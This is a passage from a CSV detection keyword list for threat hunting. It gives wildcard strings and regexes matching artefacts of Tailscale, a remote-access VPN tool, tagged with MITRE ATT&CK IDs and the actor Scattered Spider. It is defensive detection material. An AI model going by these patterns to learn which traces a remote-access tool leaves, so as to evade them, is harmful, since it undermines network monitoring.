resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "* tailscale-archive-keyring*",".{0,1000}\stailscale\-archive\-keyring.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*.tailscale-keyring.list*",".{0,1000}\.tailscale\-keyring\.list.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*/cmd/tailscaled*",".{0,1000}\/cmd\/tailscaled.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*/sources.list.d/tailscale.list*",".{0,1000}\/sources\.list\.d\/tailscale\.list.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" 
"*/tailscale update*",".{0,1000}\/tailscale\supdate.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*/tailscale.exe*",".{0,1000}\/tailscale\.exe.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*/tailscale/cli/*",".{0,1000}\/tailscale\/cli\/.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*/tailscale/client/*",".{0,1000}\/tailscale\/client\/.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*/tailscale/clientupdate/*.go*",".{0,1000}\/tailscale\/clientupdate\/.{0,1000}\.go.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered 
Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*/tailscale:unstable*",".{0,1000}\/tailscale\:unstable.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*/tailscale_*_*.deb*",".{0,1000}\/tailscale_.{0,1000}_.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*/tailscale_*_*.tgz*",".{0,1000}\/tailscale_.{0,1000}_.{0,1000}\.tgz.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*/tailscaled.defaults*",".{0,1000}\/tailscaled\.defaults.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" 
"*/tailscaled.go*",".{0,1000}\/tailscaled\.go.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*/tailscaled.sock*",".{0,1000}\/tailscaled\.sock.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*/tailscale-setup-*-*.msi*",".{0,1000}\/tailscale\-setup\-.{0,1000}\-.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*/tailscale-setup-*.exe*",".{0,1000}\/tailscale\-setup\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*/test_tailscale.sh*",".{0,1000}\/test_tailscale\.sh.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 
","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*\\.\pipe\tailscale-test*",".{0,1000}\\\\\.\\pipe\\tailscale\-test.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","#namedpipe","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*\cmd\tailscaled*",".{0,1000}\\cmd\\tailscaled.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*\tailscale.exe*",".{0,1000}\\tailscale\.exe.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*\tailscale\cli\*",".{0,1000}\\tailscale\\cli\\.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*\tailscale\client\*",".{0,1000}\\tailscale\\client\\.{0,1000}","greyware_tool_keyword","tailscale","Tailscale 
connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*\tailscale\clientupdate\*",".{0,1000}\\tailscale\\clientupdate\\.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*\tailscale\cmd\*",".{0,1000}\\tailscale\\cmd\\.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*\tailscale_*_*.deb*",".{0,1000}\\tailscale_.{0,1000}_.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*\tailscale_*_*.tgz*",".{0,1000}\\tailscale_.{0,1000}_.{0,1000}\.tgz.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense 
Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*\tailscaled.go*",".{0,1000}\\tailscaled\.go.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*\tailscale-setup-*.exe*",".{0,1000}\\tailscale\-setup\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*\test_tailscale.sh*",".{0,1000}\\test_tailscale\.sh.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" 
"*<h1>Hello from Tailscale</h1>*",".{0,1000}\<h1\>Hello\sfrom\sTailscale\<\/h1\>.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*apk add tailscale*",".{0,1000}apk\sadd\stailscale.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*cmd/tailscale*",".{0,1000}cmd\/tailscale.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*connected via tailscaled*",".{0,1000}connected\svia\stailscaled.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*EnableTailscaleDNSSettings*",".{0,1000}EnableTailscaleDNSSettings.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense 
Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*EnableTailscaleSubnets*",".{0,1000}EnableTailscaleSubnets.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*github.com/tailscale*",".{0,1000}github\.com\/tailscale.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*http://127.0.0.1:4000*",".{0,1000}http\:\/\/127\.0\.0\.1\:4000.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*http://local-tailscaled.sock*",".{0,1000}http\:\/\/local\-tailscaled\.sock.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" 
"*https://api.tailscale.com/api/v2/*",".{0,1000}https\:\/\/api\.tailscale\.com\/api\/v2\/.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*https://apps.apple.com/us/app/tailscale/id*",".{0,1000}https\:\/\/apps\.apple\.com\/us\/app\/tailscale\/id.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*https://login.tailscale.com/admin/settings/keys*",".{0,1000}https\:\/\/login\.tailscale\.com\/admin\/settings\/keys.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*https://tailscale.com/s/resolvconf-overwrite*",".{0,1000}https\:\/\/tailscale\.com\/s\/resolvconf\-overwrite.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*install -y 
tailscale*",".{0,1000}install\s\-y\stailscale.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*linuxfw.TailscaleSubnetRouteMark*",".{0,1000}linuxfw\.TailscaleSubnetRouteMark.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*local-tailscaled.sock*",".{0,1000}local\-tailscaled\.sock.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*login.tailscale.com*",".{0,1000}login\.tailscale\.com.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*pacman -S tailscale*",".{0,1000}pacman\s\-S\stailscale.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 
","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*pkgctl-Tailscale.service*",".{0,1000}pkgctl\-Tailscale\.service.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*pkgs.tailscale.com/*/*",".{0,1000}pkgs\.tailscale\.com\/.{0,1000}\/.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*rc-update add tailscale*",".{0,1000}rc\-update\sadd\stailscale.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*resolv.pre-tailscale-backup.conf*",".{0,1000}resolv\.pre\-tailscale\-backup\.conf.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" 
"*resolv.tailscale.conf*",".{0,1000}resolv\.tailscale\.conf.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*service tailscaled *",".{0,1000}service\stailscaled\s.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*Serving Tailscale web client on http://*",".{0,1000}Serving\sTailscale\sweb\sclient\son\shttp\:\/\/.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*Starting tailscaled*",".{0,1000}Starting\stailscaled.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*sudo tailscale up*",".{0,1000}sudo\stailscale\sup.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - 
TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*systemctl enable --now tailscaled*",".{0,1000}systemctl\senable\s\-\-now\stailscaled.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscale ip -4*",".{0,1000}tailscale\sip\s\-4.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*Tailscale is not running*",".{0,1000}Tailscale\sis\snot\srunning.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscale ping -*",".{0,1000}tailscale\sping\s\-.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscale serve 
-*",".{0,1000}tailscale\sserve\s\-.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscale set --auto-update*",".{0,1000}tailscale\sset\s\-\-auto\-update.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*Tailscale SSH is *",".{0,1000}Tailscale\sSSH\sis\s.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscale up --login-server=*",".{0,1000}tailscale\sup\s\-\-login\-server\=.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*Tailscale was already stopped*",".{0,1000}Tailscale\swas\salready\sstopped.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - 
TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscale.com/install.sh*",".{0,1000}tailscale\.com\/install\.sh.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscale.com/logger.Logf*",".{0,1000}tailscale\.com\/logger\.Logf.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscale.exe *",".{0,1000}tailscale\.exe\s.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscale/go/releases/download/*",".{0,1000}tailscale\/go\/releases\/download\/.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" 
